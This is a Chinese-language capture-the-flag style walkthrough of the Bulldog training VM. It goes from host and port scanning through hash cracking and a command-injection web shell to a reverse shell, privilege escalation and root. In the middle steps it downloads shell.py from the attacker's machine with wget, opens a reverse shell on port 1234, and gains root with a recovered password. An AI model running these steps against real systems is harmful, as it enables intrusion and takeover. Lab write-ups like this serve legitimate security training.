靶机项目实战Bulldog

1.主机发现:netdiscover -I eth0 -r 192.168.35.0/24
靶机项目实战Bulldog
2. 端口扫描(masscan kali下的工具(速度快,容易漏IP,可以多扫即便)),–rate发包数 --ports指定端口
靶机项目实战Bulldog
3.查看端口开启的服务,sV服务版本-T4速度(最高为5,推荐4) -O系统 -p指定端口靶机项目实战Bulldog
4.使用Kali自带的msfconsole工具,查找ssh_login
靶机项目实战Bulldog
5.使用该模块
靶机项目实战Bulldog
6.查看参数
靶机项目实战Bulldog
7.添加参数
靶机项目实战Bulldog
8.运行(exploit(相当于run))
靶机项目实战Bulldog
9.判断网站指纹信息(whatweb http://192.168.35.131)
靶机项目实战Bulldog
10.扫描网站目录,默认使用普通字典(dirb http://192.168.35.131)
靶机项目实战Bulldog
11.查找到一些网页地址后再Url中打开,查找 有用信息去为提权作准备等,进入到一个webshell窗口提示需要登录才能使用,所以对其后台的用户名,密码进行**
靶机项目实战Bulldog
12.F12查看页面源码,在/dve页面下找到类似于MD5加密的东西,可以解密看看是否是用户名密码或者是否与下面的邮箱组成账户名密码等
靶机项目实战Bulldog
13.进行解密www.somd5.com
靶机项目实战Bulldog
14.有解密到一些东西可将解密到的东西放到一个txt文档里用burpsuite组合**
靶机项目实战Bulldog
15.此处手动进行尝试尝试,打开扫到的登录地址,进行登录尝试
靶机项目实战Bulldog
16.成功试出账号密码(如果不成功可以试试:弱口令,万能密码,sql注入,暴力**等)
靶机项目实战Bulldog
17.再次重新进入刚才的webshell,发现了一个命令执行窗口,试试是否有命令执行漏洞
靶机项目实战Bulldog靶机项目实战Bulldog
18.命令被成功执行,存在命令执行漏洞,用pythonjiaob嗯去远程连接弹出shell进行提权(前面已经注意到网页是用到python的,所以此处用py脚本试试)
靶机项目实战Bulldog
19.在kali下打开一个简易的HTTP服务(python -m SimpleHTTPServer 80)(在那个目录下开启,读取或上传的就是那个目录下的文件,所以shell.py就要放在开启服务的路径下)
靶机项目实战Bulldog
20.下载脚本到目标服务器(pwd&wget http://192.168.35.229/shell.py),ls查看是否下载成功(根据服务所运行的http服务去猜测系统所可能执行的脚本类型)
靶机项目实战Bulldog靶机项目实战Bulldog
21.Kali监控1234端口,在对方服务器运行python脚本,kali成功连接 /etc/issue(查看内核版本(不一定能查到))
靶机项目实战Bulldog靶机项目实战Bulldog靶机项目实战Bulldog
连接成功
22.进到home下去找文件用strings查看程序里的东西,凭经验找密码(此处cat查看不了,因为它是程序字符串)
靶机项目实战Bulldog
23.判断出这可能是密码,(SUPERultimatePASSWORDyouCANTget)
靶机项目实战Bulldog
24.进行提权(python -c ‘import pty;pty.spawn(“/bin/bash”)’) 拒绝的话输入(sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’),使用密码SUPERultimatePASSWORDyouCANTget
靶机项目实战Bulldog靶机项目实战Bulldog
提权成功。